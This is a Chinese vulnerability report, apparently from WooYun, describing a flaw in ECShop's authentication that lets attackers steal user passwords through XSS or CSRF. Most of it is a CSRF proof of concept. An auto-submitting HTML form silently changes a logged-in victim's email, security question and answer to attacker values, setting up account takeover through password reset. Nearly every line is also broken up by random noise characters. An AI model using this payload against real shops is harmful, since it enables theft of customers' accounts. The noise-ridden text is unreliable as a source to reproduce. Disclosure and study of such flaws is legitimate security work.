简要描述:
6 s+ Y. X8 `/ F& S/ m2 M3 v8 yecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现9 b% q+ @/ A; I
- U2 d8 ]5 X% k$ M" sDemo For:http://www.wooyun.org/bug.php?action=view&id=395
3 {/ @# ~9 s) I+ t/ ~+ n# A- W
, f3 d `1 ?6 c; L3 _* k0 \- v1 Q详细说明:5 ^# B/ R; H5 k) w
利用csrf和xss可以突破官方所说的“障碍”
6 p2 n+ W+ Y% g$ \xss版本已经有人说明
0 `7 @- o* o- o5 G2 q6 ]! [这里给出csrf版本: e$ Q1 C0 ~# O H
3 s0 W; X( H9 o, k: P
漏洞证明:" U# @3 p) t5 x2 ^
<html>* ^) O% C0 k2 T: v
<body>
7 V( }7 f( x) ]<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
. j( v' P9 }6 e# A3 F q5 Z2 K<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
% r. |' s6 ?7 U% v u9 _<INPUT TYPE="text" NAME="act" value="act_edit_profile">, S8 H, C* O* i+ ~8 J [- Z/ G2 \
<INPUT TYPE="text" NAME="sel_question" value="ecshop">, {2 z& r1 q6 w0 ]6 y, T3 i. \
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">* P" q5 F; Q! W" w7 z
</body>( Y: @/ q6 l9 b" ]
<script>
& j/ ~6 d+ S9 {% f: { }document.forms[0].submit();
, s b# l0 b/ ]0 [; D% k( b</script>7 _* B$ T1 t, a% i7 a. ]0 }& U% g
</html>( M1 o. J, g2 C( w& ^# q
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失& u% k7 _+ r$ u c
( ?" p! d* [/ \2 `/ _9 E+ F
|